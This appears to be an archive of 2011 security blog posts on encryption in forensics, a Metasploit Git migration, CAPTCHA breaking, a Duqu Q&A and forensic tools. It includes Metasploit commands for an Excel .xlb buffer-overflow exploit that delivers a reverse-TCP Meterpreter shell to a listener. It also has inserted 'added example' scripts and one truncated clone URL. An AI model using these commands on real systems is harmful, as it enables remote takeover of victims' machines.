The increasing use of full disk encryption (FDE) can significantly hamper digital investigations, potentially preventing access to all digital evidence in a case. The practice of shutting down an evidential computer is not an acceptable technique when dealing with FDE or even volume encryption because it may result in all data on the device being rendered inaccessible for forensic examination. To address this challenge, there is a pressing need for more effective on-scene capabilities to detect and preserve encryption prior to pulling the plug. In addition, to give digital investigators the best chance of obtaining decrypted data in the field, prosecutors need to prepare search warrants with FDE in mind. This paper describes how FDE has hampered past investigations, and how circumventing FDE has benefited certain cases. This paper goes on to provide guidance for gathering items at the crime scene that may be useful for accessing encrypted data, and for performing on-scene forensic acquisitions of live computer systems. These measures increase the chances of acquiring digital evidence in an unencrypted state or capturing an encryption key or passphrase. Some implications for drafting and executing search warrants for dealing with FDE are discussed.

The paper does go on to suggest some ways to ameliorate these issues: better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory (with the cryogenic RAM freezing technique, presumably). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.

Thursday, November 17, 2011

Hotfix For SRP/AppLocker Bypass

Remember Microsoft has features to bypass its own Software Restriction Policies and AppLocker: Circumventing SRP and AppLocker, By Design and Circumventing SRP and AppLocker to Create a New Process, By Design.

Microsoft has issued a hotfix for this bypass: KB2532445

It is only for Windows 7 and Windows Server 2008 R2 though; it will not help you if you use SRP on Windows XP or Vista.

Tuesday, November 15, 2011

Uniscan 2.0 Released

Uniscan is an open source vulnerability scanner for web applications. Uniscan 2.0 is a Perl vulnerability scanner for RFI, LFI, RCE, XSS and SQL injection.
  • Identification of system pages through a Web Crawler.
  • Use of threads in the crawler.
  • Control of the maximum number of requests made by the crawler.
  • Control of variation of system pages identified by Web Crawler.
  • Control of file extensions that are ignored.
  • Test of pages found via the GET method.
  • Test the forms found via the POST method.
  • Support for SSL requests (HTTPS).
  • Proxy support.
  • Generate site list using Google.
  • Generate site list using Bing.
  • Plug-in support for Crawler.
  • Plug-in support for dynamic tests.
  • Plug-in support for static tests.
  • Plug-in support for stress tests.

Tutorials to create your plug-ins:

Thursday, November 10, 2011

Metasploit Changes to Git

Metasploit is changing from using their own SVN server to host their repository to GitHub, and by this move to Git as their tool for managing the main repository available to the public for getting access to the Framework source code. This also changes the way commits are done: if any non-Rapid7 employee or contractor member of the development team wants to contribute code, it will have to be through the GitHub pull request feature. This will allow Rapid7 better control over who commits and the quality of the commits, making sure that their commercial products Metasploit Community, Pro and Express do not get affected by a contribution that did not go through a proper test procedure and quality assurance. In addition, the shift from SVN to Git will allow greater flexibility to the Rapid7 team to make modifications to the framework on forks and branches on their own systems, allowing them to keep the main repository as stable as possible and changes to be pushed in a less risky manner. This is a great business move since it will reduce risk and accelerate development of the base foundation of their products, allowing the team to focus more on the technical and engineering aspects of the projects and less on the overheads of managing code on their machines. In terms of management of community commits, the pull requests will centralize the process from Redmine and the emails to the msfdev mailing list, making it easier for them to get contributions for the Framework. I do have to say I will miss the ability to push my own changes and fixes and will have to rely, like everybody else, on the fork process and GitHub pull request method, but in the long run this is a better solution for the stability of the code, faster innovation and risk reduction, allowing Rapid7 to further advance the Framework that is the base of some of their commercial products.

Now this does change my workflow for the code I write for use in Metasploit. I do have a GitHub account that I used as my temporary account for plugins and modules; I will be consolidating this into one single project in GitHub and making sure it follows the folder structure of the framework, so I can just have it on my machine under ~/.msf4. That way I can modify and test modules and plugins without the need of putting them in the framework folder itself, and move them into the forked version if I wish to contribute them to Rapid7; if not, they will still be accessible for sharing under my GitHub page. So there are now 2 new ways to use the framework repository depending on your need. If you only want to consume the code in it and do not wish to contribute your code to Rapid7, you just need to have Git on your system and clone the repository. You first start by installing Git.

Installing Git

On OS X you only need to install the latest Xcode Tools from the App Store. On CentOS 6 and the latest Fedora systems you would run as root:

yum update

yum install git

On Ubuntu and Debian systems you would run as root

apt-get update

apt-get install git-core

Cloning the Repository

I’m a person who likes having several copies of the Framework to work in; I tend to keep in my home folder on my boxes a folder called dev where I keep all the project repositories I use. So I recommend you start by creating the folder to host the project and its copies, in case you later decide to fork and work on coding inside the Framework.

mkdir -p ~/dev

cd ~/dev

Once the folder is created you only need to clone the Git repository hosted on GitHub

git clone git://

Now you should be able to use and work from inside the metasploit-framework folder created there. To keep your copy updated you only need to run, from inside that folder,

git pull

This will fetch the latest changes and merge them together.
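As an added example (not code from the original post or from the Metasploit project), here is that clone-and-update sequence together with the fork-and-pull-request workflow mentioned above, written as shell functions and rehearsed against two throwaway local bare repositories that stand in for Rapid7's repository and for your own fork. The repository names, paths, committer identity and the placeholder module file are all constructed for the demo; against GitHub only the two URLs change.

```shell
#!/bin/sh
# Added example, not code from the original post or from the Metasploit project:
# the clone / update / fork-and-topic-branch workflow described above, rehearsed
# against two throwaway bare repositories that stand in for Rapid7's repository
# ("upstream") and for your own GitHub fork ("origin"). Everything is local, so
# it runs offline; against GitHub only the two URLs change.
set -e

# Constructed committer identity so the demo commits work without a global config.
GIT_AUTHOR_NAME=demo; GIT_AUTHOR_EMAIL=demo@example.invalid
GIT_COMMITTER_NAME=demo; GIT_COMMITTER_EMAIL=demo@example.invalid
export GIT_AUTHOR_NAME GIT_AUTHOR_EMAIL GIT_COMMITTER_NAME GIT_COMMITTER_EMAIL

# Consumer workflow: clone once, then fast-forward to whatever the remote has.
msf_clone() {              # $1 = repository URL, $2 = destination directory
    git clone -q "$1" "$2" >/dev/null 2>&1
}
msf_update() {             # $1 = clone directory; --ff-only refuses to invent a merge commit
    git -C "$1" pull -q --ff-only >/dev/null 2>&1
}

# Contributor workflow: clone your fork as origin, add Rapid7's repository as
# upstream, work on a topic branch, rebase it on upstream before the pull request.
msf_fork_setup() {         # $1 = fork URL, $2 = upstream URL, $3 = destination directory
    git clone -q "$1" "$3" >/dev/null 2>&1
    git -C "$3" remote add upstream "$2"
}
msf_topic_branch() {       # $1 = clone directory, $2 = branch name
    git -C "$1" checkout -q -b "$2" >/dev/null 2>&1
}
msf_sync_with_upstream() { # $1 = clone directory, $2 = name of upstream's main branch
    git -C "$1" fetch -q upstream >/dev/null 2>&1
    git -C "$1" rebase -q "upstream/$2" >/dev/null 2>&1
}
msf_publish_branch() {     # $1 = clone directory: push the current branch to your fork
    git -C "$1" push -q -u origin HEAD >/dev/null 2>&1
}
msf_commit_count() {       # $1 = repository, $2 = ref
    git -C "$1" rev-list --count "$2"
}

# Rehearse both workflows end to end and print three commit counts: the consumer
# clone after pull, the topic branch after rebase, and that branch as seen in the fork.
demo_workflow() (
    work=$(mktemp -d)
    HOME=$work; GIT_CONFIG_NOSYSTEM=1; export HOME GIT_CONFIG_NOSYSTEM   # ignore any real git config

    # Seed one commit, then derive the two bare "remotes" from it.
    seed=$work/seed
    git init -q "$seed" >/dev/null 2>&1
    echo 'module Msf; end' > "$seed/lib.rb"
    git -C "$seed" add lib.rb
    git -C "$seed" commit -q -m 'initial import' >/dev/null 2>&1
    git clone -q --bare "$seed" "$work/rapid7.git" >/dev/null 2>&1
    git clone -q --bare "$work/rapid7.git" "$work/fork.git" >/dev/null 2>&1
    main=$(git -C "$seed" symbolic-ref --short HEAD)

    # Consumer: clone into ~/dev, upstream moves on, pull fast-forwards.
    mkdir -p "$work/dev"
    msf_clone "$work/rapid7.git" "$work/dev/metasploit-framework"
    echo '# upstream fix' >> "$seed/lib.rb"
    git -C "$seed" commit -q -am 'upstream fix' >/dev/null 2>&1
    git -C "$seed" push -q "$work/rapid7.git" HEAD >/dev/null 2>&1
    msf_update "$work/dev/metasploit-framework"
    consumer=$(msf_commit_count "$work/dev/metasploit-framework" HEAD)

    # Contributor: the fork still lacks the upstream fix; a topic branch with one
    # module, laid out as in the Framework tree, is rebased on upstream and pushed.
    c=$work/dev/metasploit-framework-fork
    msf_fork_setup "$work/fork.git" "$work/rapid7.git" "$c"
    msf_topic_branch "$c" my-module
    mkdir -p "$c/modules/auxiliary/scanner"
    echo '# constructed placeholder module' > "$c/modules/auxiliary/scanner/demo.rb"
    git -C "$c" add modules
    git -C "$c" commit -q -m 'add demo scanner module' >/dev/null 2>&1
    msf_sync_with_upstream "$c" "$main"
    msf_publish_branch "$c"
    contributor=$(msf_commit_count "$c" HEAD)
    published=$(msf_commit_count "$work/fork.git" my-module)

    rm -rf "$work"
    echo "$consumer $contributor $published"
)
```

Two practical notes. The git:// protocol shown above carries no transport authentication or encryption, so if it matters to you that the code you run is exactly what Rapid7 published, clone over https:// or ssh instead. And pulling with --ff-only makes an unexpected divergence stop the update rather than be merged silently, which is what you want for a tree that other tools load code from; the same modules/<type>/... layout used for the topic branch is the one that ~/.msf4/modules mirrors.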

Monday, November 7, 2011

Hack3rcon II 2-2 Tim Tomes and Mark Baggett Lurking in the Shadows

This nice talk will discuss the history of concealing data within operating systems and new techniques and tools for doing so in modern Windows implementations.

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway

Vulnerability reported to vendor by ZDI the 2010-10-18

Coordinated release of the vulnerability the 2011-04-12

Metasploit PoC provided the 2011-11-05

PoC provided by :

Juan Vazquez

Reference(s) :

Affected version(s) :

Microsoft Office XP Service Pack 3

Microsoft Office 2003 Service Pack 3

Microsoft Office 2007 Service Pack 2

Microsoft Office 2010 (32 and 64 bits edition)

Microsoft Office 2004 for Mac

Microsoft Office 2008 for Mac

Microsoft Office for Mac 2011

Open XML File Format Converter for Mac

Microsoft Excel Viewer Service Pack 2

Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack-based buffer overflow. This results in arbitrary code execution in the context of the current user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <listener address>
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <listener address>
exploit


Thursday, November 3, 2011

Lab Matters - Inside the Sony Hack

Lab Matters - Inside the Sony Hack:

Tim Armstrong looks at the timeline of the Sony breach and pieces together the relevant details at each point in time. He discusses the known facts of the case and the potential future fallout.

13 Out Of 15 Popular CAPTCHA Schemes Vulnerable To Automated Attacks

Security researchers have discovered the vast majority of text-based anti-spam tests are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques included removing deliberately introduced image background noise and breaking text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orient robots in unknown environments.

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests. Digg and at least one other of the sites tested have switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches towards making CAPTCHAs harder to beat, including making the length of a text string changeable and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but may counter the activities of humans.

The researchers, Elie Bursztein, Matthieu Martin and John C. Mitchell, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference on Computer and Communications Security in Chicago.

Duqu: Questions and Answers

Duqu: Questions and Answers: Due to its complexity, the Duqu case is challenging to understand. Here are some questions and answers that we hope will help.

Q: What is Duqu?
A: Because of the news and ongoing developments surrounding Duqu, that's actually a very broad question. Here's a narrow answer: Duqu is a Windows bot (not worm) that has been used as part of highly targeted attacks against a limited number of organizations, in a limited number of countries.

Q: How does Duqu spread?
A: Duqu doesn't spread on its own. In one known case, Duqu was installed by a document attachment which was delivered via an e-mail message.

Q: Isn't that the same method by which RSA was hacked?
A: Yes. Numerous targeted attacks have used this method. In the RSA case, an Excel document attachment used an embedded Flash object that exploited a zero-day vulnerability in Adobe Flash Player to install a backdoor/remote access tool (RAT) called Poison Ivy.

Q: So what's so special about Duqu's exploit?
A: The zero-day used by Duqu's installer exploits a vulnerability in the Windows kernel.

Q: How much more advanced is a Windows kernel exploit than a Flash Player exploit?
A: What? Please.

Q: No, seriously, how much?
A: Significantly more. A Windows kernel vulnerability/exploit is worth a great deal more compared to one used against a third-party application, even one so widely installed as Flash Player.

Q: Can I patch my system against this vulnerability?
A: No. You can't.

Q: So what can I do if this Windows kernel vulnerability is unpatched?
A: Wait. Microsoft Security Response is currently investigating the vulnerability and is preparing a solution. Fortunately, the exploit document is in very limited circulation, and is under an NDA.

Q: Why is there an NDA on the document?
A: Because it was such a highly targeted attack, the document itself would most likely reveal the identity of the target. Sharing the document would be a breach of customer confidentiality, and therefore CrySyS Lab (discoverer of Duqu) cannot release the document unless done in a way that protects the privacy of their customer.

Q: So Duqu's installer is not "in-the-wild"?
A: Not generally, no. Though there could be some other undiscovered variants.

Q: So is Duqu a threat to me?
A: That depends on whom you are. But generally, no. However, Duqu will eventually create a big problem.

Q: What problem will Duqu create?
A: Once Microsoft patches the Windows kernel vulnerability, criminals at large will be able to reverse engineer the patch and will discover the vulnerability. At that point, any Windows computer that isn't up to date will be more vulnerable to what could prove to be a very serious exploit.

Q: But not yet?
A: Correct.

Q: Is there anything else interesting about Duqu?
A: Yes, definitely. In one known case, a driver used by Duqu was signed using a stolen certificate issued to a Taiwanese hardware company called C-Media.

Q: Why did Duqu use a signed driver?
A: Signed drivers can circumvent security policies that prompt about or reject installation of unsigned drivers. Security policies can be configured to inherently distrust unsigned drivers. Having a driver signed by a known vendor provides a valuable level of trust.

Q: So then is that why Duqu such a big deal? Because of the zero-day and the signed driver?
A: That… and because Duqu is "related" to Stuxnet.

Q: How is it related?
A: A component of "Duqu" is nearly identical to a component of "Stuxnet" and they appear to have been authored by somebody that has access to common source code.

Q: What else relates "Duqu" and "Stuxnet"?
A: One of the drivers used by "Duqu" claims to be from a Taiwanese hardware company called JMicron. Stuxnet used drivers that were signed by a certificate stolen from JMicron.

Q: How were the certificates stolen?
A: Unknown.

Q: How many were stolen?
A: Known cases, three different hardware vendors from Taiwan: C-Media; JMicron; and Realtek.

Q: Why is "Duqu" connected to Taiwan?
A: Unknown.

Q: Why the quotes? What else is "Duqu"?
A: In a broad sense, Duqu is an "organized action" or a "mission" that has been deployed (or authorized) by a nation state.

Q: What do you mean by an "organized action"?
A: "Duqu" appears to be an espionage or reconnaissance mission of some sort. For example, in the real world, a reconnaissance mission of this sort could be considered what United States Marine Corps Force Reconnaissance (FORECON) teams call a "Green Operation".

Q: So "Duqu" isn't just malicious code?
A: The software component is only one part of what we call Duqu. Think about it like this: there's Duqu software and there's also Operation Duqu.

Q: And "Stuxnet"? What about the Stuxnet worm?
A: The installer used by Operation Stuxnet was an advanced USB worm. The worm used a zero-day Windows vulnerability to facilitate its spread.

Q: Are the missions of Operation Duqu and Operation Stuxnet the same?
A: No. Operation Stuxnet was more of a "Black Operation", a mission that involves direct action, which in Stuxnet's case, was to disrupt operations at an Iranian nuclear power facility.

Q: Stuxnet disrupted operations at a nuclear power plant?
A: Yes. Operation Stuxnet was very complex, and also, subtle. The Stuxnet worm and its additional components needed to travel a sizeable distance geographically. It also needed to infiltrate a closed target which was not connected to the Internet, on autopilot, without calling home.

Q: So that's why Stuxnet used a USB worm as the installer/infection vector?
A: Yes. Because of the difficult mitigating factors, Stuxnet needed to spread itself without any external resources. And so it was equipped with numerous zero-day exploits. Out of context, Stuxnet's infection capabilities seem to be overkill, but then, its mission appears to have been a success, so those behind Stuxnet probably don't think so.

Q: How does Duqu differ?
A: Duqu is advanced but is not configured to act autonomously. Once the installer infects its target, Duqu calls home to a command and control (C&C) server. There are two servers that are currently known. One was located in India and the other was located in Belgium. The IP addresses are now inactive.

Q: What actions were carried out by the C&C?
A: In one known case, Duqu downloaded an infostealer to collect data from the target. That infostealer is actually the component from which Duqu gets its name, because it prepends log files related to stolen data with "DQ".

Q: What else can the C&C do?
A: For example, Duqu could be instructed to spread itself on the target network via shared network resources.

Q: How did Duqu send the collected data to the C&C?
A: It encrypted the data and appended it to JPG images.

Q: What? JPG images? Why?
A: So that somebody monitoring network traffic would only see innocent looking image files instead of confidential materials.

Q: Wow. Does Duqu do anything else sneaky?
A: Yes. After 30 days, unless told otherwise by the C&C, Duqu will delete itself to limit evidence of the breach.

Q: Who is behind Duqu?
A: Unknown.

Q: What were they looking for, and why?
A: Unknown.

Q: What can you definitively tell us about Duqu?
A: The software components of "Operation Duqu" were made by a very skilled team of developers and exploit analysts.

Q: Can you speculate on Duqu's objectives?
A: Whatever it was, it must be very important to the interests of the nation state actor pulling the strings. In this actor's mind, the cost of disclosing a Windows kernel vulnerability is outweighed by the benefits. Only those with privileged information can accurately determine Duqu's true goals, unless and until an identifiable direct action results.

Q: So you think a government agency is behind Duqu?
A: Yes.

Q: Should a government actor use malware such as Duqu?
A: It doesn't appear to be up for a vote.

Q: What about Germany's R2D2 trojan?
A: R2D2 is a trojan written for police surveillance. It did not use zero-day exploits or drivers signed with stolen certificates from legitimate hardware vendors. R2D2 was commissioned by German authorities for normal police work.

Q: But police trojans are not good, right?
A: No, malware often finds a way of escaping control. It never seems like a good idea to us.

Q: How bad is R2D2?
A: R2D2 appears to have far overreached what is allowed by German law. It has created a legal and political mess in Germany, but not so much of a technical mess. Our system automation determined R2D2 should not be trusted on its own long before human analysts ever took notice of it. The thing that made R2D2 valuable to the police was its limited install base. It was not really innovative in a way that could be co-opted by criminals.

Q: Are Stuxnet/Duqu innovative?
A: Yes, very much so. Once the vulnerability is disclosed, we (and others) will need to devote numerous man-hours creating strong generic detections for this new exploit. Other members of our Labs will need to datamine our file collections for software signed by C-Media in order to rescan them and process the results. Duqu creates technical headaches and the lessons learned will be adopted by criminals at some point.

Q: What about those that say that Duqu isn't related to Stuxnet?
A: Let's compare the similarities between the two operations.

• The installer exploits a zero-day Windows kernel vulnerability (or vulnerabilities).
• Components are signed with stolen certificates.
• Highly targeted in a way that suggests advanced intelligence.

The technical development team that coded and built the infrastructure for Duqu may differ in part from the team that developed Stuxnet. The highly targeted nature of the attacks suggests a considerable amount of human intelligence work was involved. This intelligence work could have been done by the same or different analysts, but that hardly matters. Whatever the composition of the teams involved, the similarities between the operations would suggest a common nation state actor pulling the strings.

Q: Will we ever learn the identity of this nation state?
A: Doesn't seem likely… at least not anytime soon. The consequences of Duqu's wake discourage any sort of disclosure.

Q: Does this nation state actor have other operations in progress?
A: Unknown. But it wouldn't seem very surprising if so.

Q: Final question (for now): Operation Duqu used an e-mail attachment. Isn't that something that everybody should be on guard against? Why use such a basic attack methodology?
A: Because it works.
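The exfiltration trick described in the Q&A above, encrypted data appended to JPG images, leaves a structural trace you can check for yourself: a JPEG ends with the EOI marker FF D9, and anything after it is a trailer no image decoder will read. The following is an added example, not code from the F-Secure post or from any Duqu analysis; the sample files it builds are constructed byte strings, not real carrier images.

```shell
#!/bin/sh
# Added example, not code from the F-Secure post or from any Duqu analysis: a
# check for the exfiltration trick described above, data appended after the end
# of an otherwise valid JPEG. A JPEG is a chain of FF xx marker segments ending
# in the EOI marker FF D9; anything after EOI is a trailer the image decoder
# never looks at. The walker below follows the segment lengths and skips the
# entropy-coded scan data (where FF 00 stuffing and FF D0..D7 restart markers are
# legal), so it is not fooled by a stray FF D9 inside the image data.
set -e

# Print the number of bytes after the EOI marker of JPEG file $1:
# 0 for a clean file, >0 for an appended trailer, -1 if the file is not a JPEG
# or ends before an EOI marker is reached.
jpeg_trailer_bytes() {
    od -An -v -tx1 "$1" | awk '
        function hx(s,  v, i) {          # hex digits -> integer
            v = 0
            for (i = 1; i <= length(s); i++)
                v = v * 16 + index("0123456789abcdef", substr(s, i, 1)) - 1
            return v
        }
        { for (i = 1; i <= NF; i++) b[++n] = $i }
        END {
            if (n < 4 || b[1] != "ff" || b[2] != "d8") { print -1; exit }   # no SOI
            p = 3
            while (p + 1 <= n && b[p] == "ff") {
                m = b[p + 1]
                if (m == "d9") { print n - (p + 1); exit }               # EOI reached
                if (m == "ff") { p++; continue }                          # fill byte
                if (m == "01" || (m >= "d0" && m <= "d7")) { p += 2; continue }  # standalone marker
                p += 2 + hx(b[p + 2] b[p + 3])                            # skip segment payload
                if (m == "da") {                                          # SOS: skip scan data
                    while (p + 1 <= n) {
                        if (b[p] == "ff" && b[p + 1] != "00" && !(b[p + 1] >= "d0" && b[p + 1] <= "d7")) break
                        p++
                    }
                }
            }
            print -1                                                      # ran off the end
        }'
}

# List every *.jpg under $1 whose result is not 0, as "path bytes".
flag_jpeg_trailers() {
    find "$1" -type f -name '*.jpg' | while read -r f; do
        t=$(jpeg_trailer_bytes "$f")
        if [ "$t" -ne 0 ]; then printf '%s %s\n' "$f" "$t"; fi
    done
}

# Constructed sample files: a minimal JPEG (SOI, one APP0 segment, one SOS
# segment whose scan data contains FF 00 stuffing and an FF D0 restart marker,
# then EOI), the same bytes with an appended blob, and a non-JPEG named .jpg.
make_samples() {            # $1 = directory to populate
    mkdir -p "$1"
    printf '\377\330\377\340\000\004\112\106\377\332\000\003\001\017\375\231\377\000\022\377\320\253\377\331' > "$1/clean.jpg"
    cp "$1/clean.jpg" "$1/carrier.jpg"
    printf 'stolen data blob' >> "$1/carrier.jpg"       # Duqu's blob was encrypted, not readable like this
    printf 'GIF89a' > "$1/notjpeg.jpg"
}
```

Two caveats. The trailer length tells you nothing about what the trailer is, since the appended data was encrypted; a non-zero result on outbound images is a lead to pull the file and the process that wrote it, not proof of exfiltration. And some legitimate software leaves a few bytes after EOI, so run the check first on a known-clean corpus and set an expectation for your environment before treating a small trailer as suspicious.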

Friday, October 28, 2011

Tools and Links

Tools and Links: Not long ago, I started a FOSS page for my blog, so I didn't have to keep going back and searching for various tools...if I find something valuable, I'll simply post it to this page and I won't have to keep looking for it. You'll notice that I really don't have much in the way of descriptions posted yet, but that will come, and hopefully others will find it useful. That doesn't mean the page is stagnant...not at all. I'll be updating the page as time goes on.

Melissa Augustine recently posted that she'd set up Volatility 2.0 on Windows, using this installation guide, and using the EXE for Distorm3 instead of the ZIP file. Take a look, and as Melissa says, be sure to thoroughly read and follow the instructions for installing various plugins. Thanks to Jamie Levy for providing such clear guidance/instructions, as I really think that doing so lowers the "cost of entry" for such a valuable tool. Remember..."there're more things in heaven and earth than are dreamt of in your philosophy." That is, performing memory analysis is a valuable skill to have, particularly when you have access to a memory dump, or to a live system from which you can dump memory. Volatility also works with hibernation files, from whence considerable information can be drawn, as well.

Now and again, you may run across whole disk encryption, or encrypted volumes on a system. I've seen these types of systems before; in some cases, the customer has simply asked for an image (knowing that the disk is encrypted), and in others the only recourse we have to acquire a usable image for analysis is to log into the system as an Admin and perform a live acquisition.

ZeroView from Technology Pathways, to detect WDE (scroll down on the linked page)

You can also determine if the system had been used to access TrueCrypt or PGP volumes by checking the MountedDevices key in the Registry (this is something that I've covered in my books). You can use the RegRipper plugin to collect/display this information, either from a System hive extracted from a system, or from a live system that you've accessed via F-Response.

David Hull gave a presentation on "Atemporal timeline analysis" at the recent SecTorCA conference (you can find the presentation .wmv files here), and posted an abridged version of the presentation to the SANS Forensic blog (blog post here).

When I saw the title, the first thing I thought was...what? How do you talk about something independent of time in a presentation on timeline analysis? Well, as David mentions at the beginning of the recorded presentation, it's akin to "asexual sexual reproduction": the title is meant to be an oxymoron. In short, what the title seems to refer to is performing timeline analysis during an incident when you don't have any sort of time reference from which to start your analysis. This is sometimes the case...I've performed a number of exams having very little information from which to start my analysis, but finding something associated with the incident often leads me into the timeline, providing a significant level of context to the overall incident.

In this case, David said that the goal was to "find the attacker's code". Overall, the recorded presentation is a very good example of how to perform analysis using fls and timelines based solely on file system metadata, and using tools such as grep to manipulate (as David puts it, "pivot on") the data. In short, the SANS blog post doesn't really address what "atemporal" means in the context of the analysis; you really need to watch the recorded presentation to see how that term applies.
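The pivot David describes, from one artifact you do have to the events around it, as an added example that is not code from this post or from David's talk. It works on a Sleuth Kit bodyfile (what fls -m emits) with nothing but awk and sort; the bodyfile contents, file names and timestamps are constructed for the demo, only the field layout is the real one.

```shell
#!/bin/sh
# Added example, not code from the post or from David Hull's talk: the "pivot"
# step of atemporal timeline analysis on a Sleuth Kit bodyfile (what fls -m
# emits), with nothing but awk and sort. With no incident time to start from,
# you pivot on the one artifact you do have (here a file name), take its
# timestamp, and pull everything that changed in a window around it. The
# bodyfile below is constructed; the field layout is the real one:
# MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime (epoch seconds).
set -e

# Constructed bodyfile with a compromise centred on epoch 1320000000.
make_bodyfile() {           # $1 = output path
    cat > "$1" <<'EOF'
0|/usr/bin/ls|1001|r/rrwxr-xr-x|0|0|110080|1318000000|1300000000|1300000000|1300000000
0|/etc/passwd|1002|r/rrw-r--r--|0|0|1812|1319990000|1319000000|1319000000|1319000000
0|/tmp/.x/bd.so|2001|r/rrwxr-xr-x|0|0|20480|1320000000|1320000000|1320000000|1320000000
0|/etc/ld.so.preload|1003|r/rrw-r--r--|0|0|14|1320000100|1320000030|1320000030|1320000030
0|/var/log/wtmp|1004|r/rrw-rw-r--|0|0|38400|1320003600|1320003600|1320003600|1300000000
0|/home/user/notes.txt|3001|r/rrw-r--r--|0|0|512|1325000000|1325000000|1325000000|1325000000
EOF
}

# Pivot: mtime (field 9) of the first entry whose name matches the awk regex $2.
pivot_time() {              # $1 = bodyfile, $2 = name pattern
    awk -F'|' -v pat="$2" '$2 ~ pat { print $9; exit }' "$1"
}

# Flatten to one "epoch|type|name" line per timestamp (a/m/c/b = atime, mtime,
# ctime, crtime), keep those within +/- $3 seconds of epoch $2, oldest first.
timeline_window() {         # $1 = bodyfile, $2 = pivot epoch, $3 = window in seconds
    awk -F'|' -v t="$2" -v w="$3" '
        BEGIN { split("a m c b", ty, " ") }
        {
            for (i = 0; i < 4; i++) {
                e = $(8 + i)
                if (e >= t - w && e <= t + w) printf "%s|%s|%s\n", e, ty[i + 1], $2
            }
        }' "$1" | sort -t'|' -k1,1n -k2,2
}

# The two steps together: from an artifact name to the events around it.
pivot_window() {            # $1 = bodyfile, $2 = name pattern, $3 = window in seconds
    timeline_window "$1" "$(pivot_time "$1" "$2")" "$3"
}
```

With the sample above, pivoting on the suspicious shared object with a five-minute window surfaces the ld.so.preload change that happened thirty seconds later and leaves the unrelated noise (the earlier passwd read, the later logon record) outside the window; widening the window, or pivoting again on whatever the first pass turned up, is the iterative part David describes.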

Sniper Forensics
Also, be sure to check out Chris Pogue's "Sniper Forensics v3.0: Hunt" presentation, which is also available for download via the same page. There are a number of other presentations there that would be very good to watch, as well...some talk about memory analysis. The latest iteration of Chris's "Sniper Forensics" presentations (Chris is getting a lot of mileage from these things...) makes a very important point: in a lot of cases, an artifact appears to be relevant to a case based on the analyst's experience. A lot of analysts find "interesting" artifacts, but many of these artifacts don't relate directly to the goals of their analysis. Chris gives some good examples of an "expert eye"; in one slide, he shows an animal track. Most folks might not even really care about that track, but to a hunter, or someone like me (I ride horses in a national park), the track tells me a great deal about what I can expect to see.

This applies directly to "Sniper Forensics"; all snipers are trained in observation. Military snipers are trained to quickly identify military objects, and to look for things that are "different". For example, snipers will be sent to observe a route of travel, and will recognize freshly turned earth or a pile of trash on that route when the sun comes up the next day...this might indicate an attempt to hide an explosive device.

How does this apply to digital forensic analysis? Well, if you think about it, it is very applicable. For example, let's say that you happen to notice that a DLL was modified on a system. This may stand out as odd, in part because it's not something that you've seen a great deal; so you create a timeline for analysis, and see that there wasn't a system or application update at that time.

Much like a sniper, a digital forensic analyst must be focused. A sniper observes an area in order to gain intelligence...enemy troop movements, civilian traffic through the area, etc. Is the sniper concerned with the relative airspeed of an unladen swallow? While that artifact may be "interesting", it's not pertinent to the sniper's goals. The same holds true with digital forensic analysis: you may find something "interesting", but how does that apply to your goals, or should you get your scope back on the target?

Data Breach 'Best Practices'
I ran across this article recently on the GovernmentHealthIT site, and while it talks about breach response best practices, I'd strongly suggest that all four of these steps need to be performed before a breach occurs. After all, while the article specifies PII/PHI, regulatory and compliance organizations for those and other types of data (PCI) specifically state the need for an incident response plan (PCI DSS para 12.9 is just one example).

Item 1 is taking an inventory...I tell folks all the time that when I've done IR work, one of the first things I ask is, where is your critical data? Most folks don't know. A few that did have also claimed (incorrectly) that it was encrypted at rest. I've only been to one site where the location of sensitive data was known and documented prior to a breach, and that information not only helped our response analysis immensely, it also reduced the overall cost of the response (in fines, notification costs, etc.) for the customer.

While I agree with the sentiment of item 4 in the article (look at the breach as an opportunity), I do not agree with the rest of that item; i.e., "the opportunity to find all the vulnerabilities in an organization—and find the resources for fixing them."

Media Stuff
Brian Krebs has long followed and written on the topic of cybercrime, and one of his recent posts is no exception. I had a number of take-aways from this post that may not be intuitively obvious:

